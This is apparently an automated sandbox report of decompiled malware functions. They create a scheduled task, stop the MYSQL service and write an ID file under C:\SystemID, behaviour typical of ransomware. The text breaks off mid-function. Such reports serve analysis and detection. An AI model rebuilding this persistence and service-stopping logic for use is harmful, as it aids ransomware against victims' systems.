                                                                                                    • CoInitialize.OLE32(00000000), ref: 0040DAEB
                                                                                                    • CoCreateInstance.OLE32(004D4F6C,00000000,00000001,004D4F3C,?,?,004CA948,000000FF), ref: 0040DB0B
                                                                                                    • lstrcpyW.KERNEL32 ref: 0040DBD6
                                                                                                    • PathRemoveFileSpecW.SHLWAPI(?,?,?,?,?,?,004CA948,000000FF), ref: 0040DBE3
                                                                                                    • _memset.LIBCMT ref: 0040DC38
                                                                                                    • CoUninitialize.OLE32 ref: 0040DC92
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.651464956.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.651464956.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.651464956.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_400000_9721.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: CreateFileInitializeInstancePathRemoveSpecUninitialize_memsetlstrcpy
                                                                                                    • String ID: --Task$Comment$Time Trigger Task
                                                                                                    • API String ID: 330603062-1376107329
                                                                                                    • Opcode ID: 4f76096c1bb55b8fd6772bfaf79823c9e02c83c8f45e810a8838bdd484e9cb7f
                                                                                                    • Instruction ID: 3ca8ca325a9fd4b6db29fab4a8cd6851ae340f1496bb62272076f21ffc706129
                                                                                                    • Opcode Fuzzy Hash: 4f76096c1bb55b8fd6772bfaf79823c9e02c83c8f45e810a8838bdd484e9cb7f
                                                                                                    • Instruction Fuzzy Hash: E051F670A40209AFDB00DF94CC99FAE7BB9FF88705F208469F505AB2A0DB75A945CF54
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    C-Code - Quality: 100%
                                                                                                    			E00411A10() {
                                                                                                    				long _v8;
                                                                                                    				intOrPtr _v12;
                                                                                                    				intOrPtr _v28;
                                                                                                    				struct _SERVICE_STATUS _v32;
                                                                                                    				void* _t9;
                                                                                                    				int _t10;
                                                                                                    				intOrPtr _t16;
                                                                                                    				void* _t19;
                                                                                                    				intOrPtr _t23;
                                                                                                    				void* _t26;
                                                                                                    
                                                                                                    				_t9 = OpenSCManagerW(0, 0, 1);
                                                                                                    				_t19 = _t9;
                                                                                                    				if(_t19 != 0) {
                                                                                                    					_t10 = OpenServiceW(_t19, L"MYSQL", 0x20);
                                                                                                    					_t26 = _t10;
                                                                                                    					if(_t26 == 0) {
                                                                                                    						L12:
                                                                                                    						return _t10;
                                                                                                    					}
                                                                                                    					if(ControlService(_t26, 1,  &_v32) == 0) {
                                                                                                    						L11:
                                                                                                    						_t10 = CloseServiceHandle(_t19);
                                                                                                    						goto L12;
                                                                                                    					}
                                                                                                    					if(QueryServiceStatus(_t26,  &_v32) == 0 || _v28 == 1) {
                                                                                                    						L10:
                                                                                                    						CloseServiceHandle(_t26);
                                                                                                    						goto L11;
                                                                                                    					} else {
                                                                                                    						_t16 = _v12;
                                                                                                    						do {
                                                                                                    							_t23 = _t16;
                                                                                                    							Sleep(_v8);
                                                                                                    							if(QueryServiceStatus(_t26,  &_v32) == 0) {
                                                                                                    								break;
                                                                                                    							}
                                                                                                    							_t16 = _v12;
                                                                                                    						} while (_t16 >= _t23 && _v28 != 1);
                                                                                                    						goto L10;
                                                                                                    					}
                                                                                                    				}
                                                                                                    				return _t9;
                                                                                                    			}













                                                                                                    0x00411a1d
                                                                                                    0x00411a23
                                                                                                    0x00411a27
                                                                                                    0x00411a32
                                                                                                    0x00411a38
                                                                                                    0x00411a3c
                                                                                                    0x00411aa4
                                                                                                    0x00000000
                                                                                                    0x00411aa4
                                                                                                    0x00411a54
                                                                                                    0x00411aa0
                                                                                                    0x00411aa1
                                                                                                    0x00000000
                                                                                                    0x00411aa3
                                                                                                    0x00411a63
                                                                                                    0x00411a9d
                                                                                                    0x00411a9e
                                                                                                    0x00000000
                                                                                                    0x00411a6b
                                                                                                    0x00411a6b
                                                                                                    0x00411a70
                                                                                                    0x00411a73
                                                                                                    0x00411a75
                                                                                                    0x00411a88
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00411a8a
                                                                                                    0x00411a8d
                                                                                                    0x00000000
                                                                                                    0x00411a97
                                                                                                    0x00411a63
                                                                                                    0x00411aa9

                                                                                                    APIs
                                                                                                    • OpenSCManagerW.ADVAPI32(00000000,00000000,00000001), ref: 00411A1D
                                                                                                    • OpenServiceW.ADVAPI32(00000000,MYSQL,00000020), ref: 00411A32
                                                                                                    • ControlService.ADVAPI32(00000000,00000001,?), ref: 00411A46
                                                                                                    • QueryServiceStatus.ADVAPI32(00000000,?), ref: 00411A5B
                                                                                                    • Sleep.KERNEL32(?), ref: 00411A75
                                                                                                    • QueryServiceStatus.ADVAPI32(00000000,?), ref: 00411A80
                                                                                                    • CloseServiceHandle.ADVAPI32(00000000), ref: 00411A9E
                                                                                                    • CloseServiceHandle.ADVAPI32(00000000), ref: 00411AA1
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.651464956.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.651464956.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.651464956.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_400000_9721.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: Service$CloseHandleOpenQueryStatus$ControlManagerSleep
                                                                                                    • String ID: MYSQL
                                                                                                    • API String ID: 2359367111-1651825290
                                                                                                    • Opcode ID: 692faa110e64916c7c56b6385ee5ad1bce035bf71229861a57ca5c091c1d7d7f
                                                                                                    • Instruction ID: 28721974f2ef8f77e49d09c1c1511d7c7b7ffc9f5d452c27f8aea73f5df61dea
                                                                                                    • Opcode Fuzzy Hash: 692faa110e64916c7c56b6385ee5ad1bce035bf71229861a57ca5c091c1d7d7f
                                                                                                    • Instruction Fuzzy Hash: 7F117735A01209ABDB209BD59D88FEF7FACEF45791F040122FB08D2250D728D985CAA8
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    C-Code - Quality: 56%
                                                                                                    			E0044F26C(void* __eflags, char _a4) {
                                                                                                    				char _v16;
                                                                                                    				char _v24;
                                                                                                    				char _v44;
                                                                                                    				intOrPtr _v52;
                                                                                                    				char _v76;
                                                                                                    				char _v84;
                                                                                                    				char _v104;
                                                                                                    				void* _t50;
                                                                                                    				void* _t51;
                                                                                                    
                                                                                                    				_t51 = _t50 - 0xc;
                                                                                                    				E00430CFC( &_v16,  &_a4);
                                                                                                    				_v16 = 0x4d6560;
                                                                                                    				E00430ECA( &_v16, 0x508238);
                                                                                                    				asm("int3");
                                                                                                    				_push(_t50);
                                                                                                    				E00430CFC( &_v44,  &_v24);
                                                                                                    				_v44 = 0x4d6578;
                                                                                                    				E00430ECA( &_v44, 0x508274);
                                                                                                    				asm("int3");
                                                                                                    				_push(_t51);
                                                                                                    				E0044EF74( &_v76, _v52);
                                                                                                    				E00430ECA( &_v76, 0x508320);
                                                                                                    				asm("int3");
                                                                                                    				_push(_t51 - 0xc);
                                                                                                    				E00430CFC( &_v104,  &_v84);
                                                                                                    				_v104 = 0x4d656c;
                                                                                                    				E00430ECA( &_v104, 0x5082cc);
                                                                                                    				asm("int3");
                                                                                                    				return "bad function call";
                                                                                                    			}












                                                                                                    0x0044f26f
                                                                                                    0x0044f27f
                                                                                                    0x0044f28c
                                                                                                    0x0044f294
                                                                                                    0x0044f299
                                                                                                    0x0044f29a
                                                                                                    0x0044f2ad
                                                                                                    0x0044f2ba
                                                                                                    0x0044f2c2
                                                                                                    0x0044f2c7
                                                                                                    0x0044f2c8
                                                                                                    0x0044f2d4
                                                                                                    0x0044f2e2
                                                                                                    0x0044f2e7
                                                                                                    0x0044f2e8
                                                                                                    0x0044f2fb
                                                                                                    0x0044f308
                                                                                                    0x0044f310
                                                                                                    0x0044f315
                                                                                                    0x0044f31b

                                                                                                    APIs
                                                                                                    • std::exception::exception.LIBCMT ref: 0044F27F
                                                                                                      • Part of subcall function 00430CFC: std::exception::_Copy_str.LIBCMT ref: 00430D15
                                                                                                    • __CxxThrowException@8.LIBCMT ref: 0044F294
                                                                                                      • Part of subcall function 00430ECA: RaiseException.KERNEL32(?,?,?,<yP,?,?,?,?,?,00423B9C,?,0050793C,?,00000001), ref: 00430F1F
                                                                                                    • std::exception::exception.LIBCMT ref: 0044F2AD
                                                                                                    • __CxxThrowException@8.LIBCMT ref: 0044F2C2
                                                                                                    • std::regex_error::regex_error.LIBCPMT ref: 0044F2D4
                                                                                                      • Part of subcall function 0044EF74: std::exception::exception.LIBCMT ref: 0044EF8E
                                                                                                    • __CxxThrowException@8.LIBCMT ref: 0044F2E2
                                                                                                    • std::exception::exception.LIBCMT ref: 0044F2FB
                                                                                                    • __CxxThrowException@8.LIBCMT ref: 0044F310
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.651464956.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.651464956.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.651464956.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_400000_9721.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: Exception@8Throwstd::exception::exception$Copy_strExceptionRaisestd::exception::_std::regex_error::regex_error
                                                                                                    • String ID: bad function call
                                                                                                    • API String ID: 2464034642-3612616537
                                                                                                    • Opcode ID: ed214ebb3701571be2f43069d920533da395f334550e3d3fd8b3428f3c6f404b
                                                                                                    • Instruction ID: b7a33952e270e61bb8336860f47bfa26d0287e47148adb1a9e07c7a629f44a3a
                                                                                                    • Opcode Fuzzy Hash: ed214ebb3701571be2f43069d920533da395f334550e3d3fd8b3428f3c6f404b
                                                                                                    • Instruction Fuzzy Hash: 60110A74D0020DBBCB04FFA5D566CDDBB7CEA04348F408A67BD2497241EB78A7498B99
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    C-Code - Quality: 69%
                                                                                                    			E00465480(char* _a4, char* _a8) {
                                                                                                    				signed int _v8;
                                                                                                    				short _v24;
                                                                                                    				int _v28;
                                                                                                    				int _v32;
                                                                                                    				short* _v36;
                                                                                                    				void* _v48;
                                                                                                    				void* __ebx;
                                                                                                    				void* __edi;
                                                                                                    				void* __esi;
                                                                                                    				void* __ebp;
                                                                                                    				signed int _t25;
                                                                                                    				char _t27;
                                                                                                    				int _t28;
                                                                                                    				signed int _t29;
                                                                                                    				short* _t32;
                                                                                                    				signed int _t41;
                                                                                                    				int _t58;
                                                                                                    				char* _t59;
                                                                                                    				char* _t60;
                                                                                                    				char* _t64;
                                                                                                    				char* _t68;
                                                                                                    				char* _t69;
                                                                                                    				signed int _t71;
                                                                                                    				short* _t72;
                                                                                                    				void* _t85;
                                                                                                    
                                                                                                    				E0042F7C0(0x20);
                                                                                                    				_t25 =  *0x50ad20; // 0x2cb5b44c
                                                                                                    				_v8 = _t25 ^ _t71;
                                                                                                    				_t59 = _a8;
                                                                                                    				_t69 = _a4;
                                                                                                    				_t60 = _t69;
                                                                                                    				_t68 =  &(_t60[1]);
                                                                                                    				do {
                                                                                                    					_t27 =  *_t60;
                                                                                                    					_t60 =  &(_t60[1]);
                                                                                                    				} while (_t27 != 0);
                                                                                                    				_v28 = 8;
                                                                                                    				_t28 = _t60 - _t68 + 1;
                                                                                                    				_v32 = _t28;
                                                                                                    				_t29 = MultiByteToWideChar(0xfde9, 8, _t69, _t28, 0, 0);
                                                                                                    				_t70 = _t29;
                                                                                                    				if(_t29 > 0) {
                                                                                                    					L6:
                                                                                                    					E0043F980(_t70 + _t70);
                                                                                                    					_t32 = _t72;
                                                                                                    					_t70 = MultiByteToWideChar;
                                                                                                    					_v36 = _t32;
                                                                                                    					__eflags = MultiByteToWideChar(0xfde9, _v28, _t69, _v32, _t32, MultiByteToWideChar);
                                                                                                    					if(__eflags == 0) {
                                                                                                    						goto L18;
                                                                                                    					} else {
                                                                                                    						_t64 = _t59;
                                                                                                    						_t68 =  &(_t64[1]);
                                                                                                    						do {
                                                                                                    							_t41 =  *_t64;
                                                                                                    							_t64 =  &(_t64[1]);
                                                                                                    							__eflags = _t41;
                                                                                                    						} while (_t41 != 0);
                                                                                                    						__eflags = MultiByteToWideChar(0xfde9, 0, _t59, _t64 - _t68 + 1,  &_v24, 8);
                                                                                                    						if(__eflags == 0) {
                                                                                                    							goto L18;
                                                                                                    						} else {
                                                                                                    							_t70 = E00420FDD(_v36,  &_v24);
                                                                                                    							_t72 =  &(_t72[4]);
                                                                                                    							__eflags = _t70;
                                                                                                    							if(__eflags != 0) {
                                                                                                    								goto L15;
                                                                                                    							} else {
                                                                                                    								__eflags =  *((intOrPtr*)(E00425208(__eflags))) - 2;
                                                                                                    								if(__eflags == 0) {
                                                                                                    									goto L14;
                                                                                                    								} else {
                                                                                                    									__eflags =  *((intOrPtr*)(E00425208(__eflags))) - 9;
                                                                                                    									goto L13;
                                                                                                    								}
                                                                                                    							}
                                                                                                    						}
                                                                                                    					}
                                                                                                    				} else {
                                                                                                    					if(GetLastError() != 0x3ec) {
                                                                                                    						L5:
                                                                                                    						_t85 = GetLastError() - 0x459;
                                                                                                    						L13:
                                                                                                    						if(_t85 != 0) {
                                                                                                    							L18:
                                                                                                    							E004512D0(_t59, _t68, _t69, _t71, __eflags, 2, 1, GetLastError(), ".\\crypto\\bio\\bss_file.c", 0xa9);
                                                                                                    							_push("\')");
                                                                                                    							_push(_t59);
                                                                                                    							_push("\',\'");
                                                                                                    							_push(_t69);
                                                                                                    							E004504A0(5, "fopen(\'");
                                                                                                    							__eflags =  *((intOrPtr*)(E00425208(__eflags))) - 2;
                                                                                                    							if(__eflags != 0) {
                                                                                                    								_push(0xae);
                                                                                                    								_push(".\\crypto\\bio\\bss_file.c");
                                                                                                    								_push(2);
                                                                                                    							} else {
                                                                                                    								_push(0xac);
                                                                                                    								_push(".\\crypto\\bio\\bss_file.c");
                                                                                                    								_push(0x80);
                                                                                                    							}
                                                                                                    							_push(0x6d);
                                                                                                    							_push(0x20);
                                                                                                    							E004512D0(_t59, _t68, _t69, _t71, __eflags);
                                                                                                    							goto L22;
                                                                                                    						} else {
                                                                                                    							L14:
                                                                                                    							_t70 = E004220B6(_t69, _t59);
                                                                                                    							_t72 =  &(_t72[4]);
                                                                                                    							if(_t70 == 0) {
                                                                                                    								goto L18;
                                                                                                    							} else {
                                                                                                    								L15:
                                                                                                    								_t69 = E0044F960(_t59, _t68, 0x50f2e0);
                                                                                                    								_t87 = _t69;
                                                                                                    								if(_t69 != 0) {
                                                                                                    									E0044F3B0(_t69, 0);
                                                                                                    									E0044F3E0(_t69, _t71, _t69, 0x6a, 1, _t70);
                                                                                                    									__eflags = _v8 ^ _t71;
                                                                                                    									return E0042A77E(_t59, _v8 ^ _t71, _t68, _t69, _t70);
                                                                                                    								} else {
                                                                                                    									_push(_t70);
                                                                                                    									E00423A38(_t59, _t69, _t70, _t87);
                                                                                                    									L22:
                                                                                                    									return E0042A77E(_t59, _v8 ^ _t71, _t68, _t69, _t70);
                                                                                                    								}
                                                                                                    							}
                                                                                                    						}
                                                                                                    					} else {
                                                                                                    						_v28 = 0;
                                                                                                    						_t58 = MultiByteToWideChar(0xfde9, 0, _t69, _v32, 0, 0);
                                                                                                    						_t70 = _t58;
                                                                                                    						if(_t58 > 0) {
                                                                                                    							goto L6;
                                                                                                    						} else {
                                                                                                    							goto L5;
                                                                                                    						}
                                                                                                    					}
                                                                                                    				}
                                                                                                    			}




























                                                                                                    0x00465488
                                                                                                    0x0046548d
                                                                                                    0x00465494
                                                                                                    0x00465498
                                                                                                    0x0046549d
                                                                                                    0x004654a0
                                                                                                    0x004654a2
                                                                                                    0x004654a5
                                                                                                    0x004654a5
                                                                                                    0x004654a7
                                                                                                    0x004654a8
                                                                                                    0x004654b0
                                                                                                    0x004654b9
                                                                                                    0x004654c5
                                                                                                    0x004654c8
                                                                                                    0x004654ce
                                                                                                    0x004654d2
                                                                                                    0x00465510
                                                                                                    0x00465513
                                                                                                    0x00465518
                                                                                                    0x0046551b
                                                                                                    0x00465525
                                                                                                    0x00465533
                                                                                                    0x00465535
                                                                                                    0x00000000
                                                                                                    0x0046553b
                                                                                                    0x0046553b
                                                                                                    0x0046553d
                                                                                                    0x00465540
                                                                                                    0x00465540
                                                                                                    0x00465542
                                                                                                    0x00465543
                                                                                                    0x00465543
                                                                                                    0x0046555d
                                                                                                    0x0046555f
                                                                                                    0x00000000
                                                                                                    0x00465565
                                                                                                    0x00465571
                                                                                                    0x00465573
                                                                                                    0x00465576
                                                                                                    0x00465578
                                                                                                    0x00000000
                                                                                                    0x0046557a
                                                                                                    0x0046557f
                                                                                                    0x00465582
                                                                                                    0x00000000
                                                                                                    0x00465584
                                                                                                    0x00465589
                                                                                                    0x00000000
                                                                                                    0x00465589
                                                                                                    0x00465582
                                                                                                    0x00465578
                                                                                                    0x0046555f
                                                                                                    0x004654d4
                                                                                                    0x004654df
                                                                                                    0x00465503
                                                                                                    0x00465509
                                                                                                    0x0046558c
                                                                                                    0x0046558c
                                                                                                    0x004655eb
                                                                                                    0x00465600
                                                                                                    0x00465605
                                                                                                    0x0046560a
                                                                                                    0x0046560b
                                                                                                    0x00465610
                                                                                                    0x00465618
                                                                                                    0x00465625
                                                                                                    0x00465628
                                                                                                    0x0046563b
                                                                                                    0x00465640
                                                                                                    0x00465645
                                                                                                    0x0046562a
                                                                                                    0x0046562a
                                                                                                    0x0046562f
                                                                                                    0x00465634
                                                                                                    0x00465634
                                                                                                    0x00465647
                                                                                                    0x00465649
                                                                                                    0x0046564b
                                                                                                    0x00000000
                                                                                                    0x0046558e
                                                                                                    0x0046558e
                                                                                                    0x00465595
                                                                                                    0x00465597
                                                                                                    0x0046559c
                                                                                                    0x00000000
                                                                                                    0x0046559e
                                                                                                    0x0046559e
                                                                                                    0x004655a8
                                                                                                    0x004655ad
                                                                                                    0x004655af
                                                                                                    0x004655c2
                                                                                                    0x004655cd
                                                                                                    0x004655e0
                                                                                                    0x004655ea
                                                                                                    0x004655b1
                                                                                                    0x004655b1
                                                                                                    0x004655b2
                                                                                                    0x00465653
                                                                                                    0x00465668
                                                                                                    0x00465668
                                                                                                    0x004655af
                                                                                                    0x0046559c
                                                                                                    0x004654e1
                                                                                                    0x004654e8
                                                                                                    0x004654f7
                                                                                                    0x004654fd
                                                                                                    0x00465501
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00465501
                                                                                                    0x004654df

                                                                                                    APIs
                                                                                                    • MultiByteToWideChar.KERNEL32(0000FDE9,00000008,?,?,00000000,?,?,00000000), ref: 004654C8
                                                                                                    • GetLastError.KERNEL32(?,?,00000000), ref: 004654D4
                                                                                                    • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,?,00000000,00000000,?,?,00000000), ref: 004654F7
                                                                                                    • GetLastError.KERNEL32(?,?,00000000), ref: 00465503
                                                                                                    • MultiByteToWideChar.KERNEL32(0000FDE9,00000008,?,?,?,00000000,?,?,00000000), ref: 00465531
                                                                                                    • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,?,?,00000008,?,00000000,?,?,00000000), ref: 0046555B
                                                                                                    • GetLastError.KERNEL32(.\crypto\bio\bss_file.c,000000A9,?,00000000,?,?,00000000), ref: 004655F5
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.651464956.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.651464956.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.651464956.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_400000_9721.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: ByteCharMultiWide$ErrorLast
                                                                                                    • String ID: ','$.\crypto\bio\bss_file.c$fopen('
                                                                                                    • API String ID: 1717984340-2085858615
                                                                                                    • Opcode ID: 5bed85aa8c1b563afb7458887addcfa84ee938cd819de717f6d53dc9ad9ea7b7
                                                                                                    • Instruction ID: 21cfcf061b86b0f752f7d9b12bec731e5652c25b667fcf3b1ac9b742683446ef
                                                                                                    • Opcode Fuzzy Hash: 5bed85aa8c1b563afb7458887addcfa84ee938cd819de717f6d53dc9ad9ea7b7
                                                                                                    • Instruction Fuzzy Hash: 5A518E71B40704BBEB206B61DC47FBF7769AF05715F40012BFD05BA2C1E669490186AB
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    C-Code - Quality: 88%
                                                                                                    			E0040C740(char _a4, intOrPtr _a20, intOrPtr _a24) {
                                                                                                    				struct _SECURITY_ATTRIBUTES* _v8;
                                                                                                    				intOrPtr _v16;
                                                                                                    				intOrPtr _v20;
                                                                                                    				intOrPtr _v24;
                                                                                                    				signed int _v28;
                                                                                                    				signed int _v32;
                                                                                                    				intOrPtr _v36;
                                                                                                    				struct _SECURITY_ATTRIBUTES* _v40;
                                                                                                    				struct _SECURITY_ATTRIBUTES* _v56;
                                                                                                    				char _v316;
                                                                                                    				void* __ebx;
                                                                                                    				void* __edi;
                                                                                                    				void* __esi;
                                                                                                    				void* __ebp;
                                                                                                    				intOrPtr _t77;
                                                                                                    				intOrPtr _t79;
                                                                                                    				signed int _t86;
                                                                                                    				void* _t92;
                                                                                                    				void* _t95;
                                                                                                    				void* _t96;
                                                                                                    				signed int _t98;
                                                                                                    				struct _SECURITY_ATTRIBUTES** _t101;
                                                                                                    				DWORD* _t109;
                                                                                                    				void* _t117;
                                                                                                    				signed int _t121;
                                                                                                    				intOrPtr _t123;
                                                                                                    				intOrPtr* _t126;
                                                                                                    				signed int _t127;
                                                                                                    				signed int _t128;
                                                                                                    				signed int _t138;
                                                                                                    				intOrPtr _t141;
                                                                                                    				signed int _t142;
                                                                                                    				signed int _t143;
                                                                                                    				intOrPtr _t144;
                                                                                                    				signed int _t146;
                                                                                                    				signed int _t147;
                                                                                                    				signed int _t150;
                                                                                                    				intOrPtr _t151;
                                                                                                    				void* _t153;
                                                                                                    				void* _t155;
                                                                                                    				void* _t156;
                                                                                                    
                                                                                                    				_push(0xffffffff);
                                                                                                    				_push(0x4ca7b8);
                                                                                                    				_push( *[fs:0x0]);
                                                                                                    				 *[fs:0x0] = _t151;
                                                                                                    				_v8 = 0;
                                                                                                    				_t121 = 0;
                                                                                                    				_t138 = 0;
                                                                                                    				_v32 = 0;
                                                                                                    				_t141 = 0;
                                                                                                    				_v28 = 0;
                                                                                                    				_v24 = 0;
                                                                                                    				_v8 = 1;
                                                                                                    				_t77 = E00420FDD(L"C:\\SystemID\\PersonalID.txt", "r");
                                                                                                    				_t153 = _t151 - 0x130 + 8;
                                                                                                    				_v20 = _t77;
                                                                                                    				if(_t77 == 0) {
                                                                                                    					L28:
                                                                                                    					_t142 = _t121;
                                                                                                    					if(_t121 == _t138) {
                                                                                                    						L32:
                                                                                                    						CreateDirectoryW(L"C:\\SystemID", 0);
                                                                                                    						_t79 = E00420FDD(L"C:\\SystemID\\PersonalID.txt", "w");
                                                                                                    						_t153 = _t153 + 8;
                                                                                                    						_v20 = _t79;
                                                                                                    						if(_t79 != 0) {
                                                                                                    							_t143 = _t121;
                                                                                                    							__eflags = _t121 - _t138;
                                                                                                    							if(_t121 == _t138) {
                                                                                                    								L47:
                                                                                                    								__eflags = _a24 - 8;
                                                                                                    								_t144 = _v20;
                                                                                                    								_t81 =  >=  ? _a4 :  &_a4;
                                                                                                    								_push(_t144);
                                                                                                    								_push( >=  ? _a4 :  &_a4);
                                                                                                    								E004228FD(_t121, _t135, _t138, _t144, __eflags);
                                                                                                    								_push(_t144);
                                                                                                    								_push("\n");
                                                                                                    								E004228FD(_t121, _t135, _t138, _t144, __eflags);
                                                                                                    								_push(_t144);
                                                                                                    								_t79 = E00423A38(_t121, _t138, _t144, __eflags);
                                                                                                    								_t153 = _t153 + 0x14;
                                                                                                    								__eflags = _t121;
                                                                                                    								if(_t121 == 0) {
                                                                                                    									L54:
                                                                                                    									if(_a24 >= 8) {
                                                                                                    										_t79 = L00422587(_a4);
                                                                                                    									}
                                                                                                    									 *[fs:0x0] = _v16;
                                                                                                    									return _t79;
                                                                                                    								}
                                                                                                    								_t146 = _t121;
                                                                                                    								__eflags = _t121 - _t138;
                                                                                                    								if(_t121 == _t138) {
                                                                                                    									L53:
                                                                                                    									_t79 = L00422587(_t121);
                                                                                                    									_t153 = _t153 + 4;
                                                                                                    									goto L54;
                                                                                                    								}
                                                                                                    								do {
                                                                                                    									__eflags =  *((intOrPtr*)(_t146 + 0x14)) - 8;
                                                                                                    									if( *((intOrPtr*)(_t146 + 0x14)) >= 8) {
                                                                                                    										L00422587( *_t146);
                                                                                                    										_t153 = _t153 + 4;
                                                                                                    									}
                                                                                                    									 *((intOrPtr*)(_t146 + 0x14)) = 7;
                                                                                                    									 *(_t146 + 0x10) = 0;
                                                                                                    									 *_t146 = 0;
                                                                                                    									_t146 = _t146 + 0x18;
                                                                                                    									__eflags = _t146 - _t138;
                                                                                                    								} while (_t146 != _t138);
                                                                                                    								goto L53;
                                                                                                    							}
                                                                                                    							_t123 = _v20;
                                                                                                    							do {
                                                                                                    								__eflags =  *((intOrPtr*)(_t143 + 0x14)) - 8;
                                                                                                    								if(__eflags < 0) {
                                                                                                    									_t86 = _t143;
                                                                                                    								} else {
                                                                                                    									_t86 =  *_t143;
                                                                                                    								}
                                                                                                    								_push(_t123);
                                                                                                    								_push(_t86);
                                                                                                    								E004228FD(_t123, _t135, _t138, _t143, __eflags);
                                                                                                    								_t143 = _t143 + 0x18;
                                                                                                    								_t153 = _t153 + 8;
                                                                                                    								__eflags = _t143 - _t138;
                                                                                                    							} while (_t143 != _t138);
                                                                                                    							_t121 = _v32;
                                                                                                    							goto L47;
                                                                                                    						}
                                                                                                    						L33:
                                                                                                    						if(_t121 == 0) {
                                                                                                    							goto L54;
                                                                                                    						}
                                                                                                    						_t147 = _t121;
                                                                                                    						if(_t121 == _t138) {
                                                                                                    							goto L53;
                                                                                                    						}
                                                                                                    						do {
                                                                                                    							if( *((intOrPtr*)(_t147 + 0x14)) >= 8) {
                                                                                                    								L00422587( *_t147);
                                                                                                    								_t153 = _t153 + 4;
                                                                                                    							}
                                                                                                    							 *((intOrPtr*)(_t147 + 0x14)) = 7;
                                                                                                    							 *(_t147 + 0x10) = 0;
                                                                                                    							 *_t147 = 0;
                                                                                                    							_t147 = _t147 + 0x18;
                                                                                                    						} while (_t147 != _t138);
                                                                                                    						goto L53;
                                                                                                    					}
                                                                                                    					while(1) {
                                                                                                    						_t91 =  >=  ? _a4 :  &_a4;
                                                                                                    						_t79 = E00414C60(_t142,  >=  ? _a4 :  &_a4, 0, _a20);
                                                                                                    						if(_t79 != 0xffffffff) {
                                                                                                    							goto L33;
                                                                                                    						}
                                                                                                    						_t142 = _t142 + 0x18;
                                                                                                    						if(_t142 != _t138) {
                                                                                                    							continue;
                                                                                                    						}
                                                                                                    						goto L32;
                                                                                                    					}
                                                                                                    					goto L33;
                                                                                                    				}
                                                                                                    				_t92 = E00420546(_t77);
                                                                                                    				_t155 = _t153 + 4;
                                                                                                    				_t158 = _t92;
                                                                                                    				if(_t92 != 0) {
                                                                                                    					L27:
                                                                                                    					_push(_v20);
                                                                                                    					E00423A38(_t121, _t138, _t141, _t166);
                                                                                                    					_t153 = _t155 + 4;
                                                                                                    					goto L28;
                                                                                                    				} else {
                                                                                                    					do {
                                                                                                    						_push(_v20);
                                                                                                    						_push(0x7e);
                                                                                                    						_push( &_v316);
                                                                                                    						_t95 = E00421101(_t121, _t138, _t141, _t158);
                                                                                                    						_t156 = _t155 + 0xc;
                                                                                                    						if(_t95 == 0) {
                                                                                                    							goto L26;
                                                                                                    						}
                                                                                                    						_v36 = 7;
                                                                                                    						_v40 = 0;
                                                                                                    						_v56 = 0;
                                                                                                    						if(_v316 != 0) {
                                                                                                    							_t126 =  &_v316;
                                                                                                    							_t135 = _t126 + 2;
                                                                                                    							do {
                                                                                                    								_t98 =  *_t126;
                                                                                                    								_t126 = _t126 + 2;
                                                                                                    								__eflags = _t98;
                                                                                                    							} while (_t98 != 0);
                                                                                                    							_t127 = _t126 - _t135;
                                                                                                    							__eflags = _t127;
                                                                                                    							_t128 = _t127 >> 1;
                                                                                                    							goto L9;
                                                                                                    						} else {
                                                                                                    							_t128 = 0;
                                                                                                    							L9:
                                                                                                    							_push(_t128);
                                                                                                    							_t129 =  &_v56;
                                                                                                    							E00415C10(_t121,  &_v56, _t138, _t141,  &_v316);
                                                                                                    							_t101 =  &_v56;
                                                                                                    							_v8 = 2;
                                                                                                    							if(_t101 >= _t138 || _t121 > _t101) {
                                                                                                    								__eflags = _t138 - _t141;
                                                                                                    								if(_t138 == _t141) {
                                                                                                    									E00414F70(_t121,  &_v32, _t138, _t129);
                                                                                                    									_t138 = _v28;
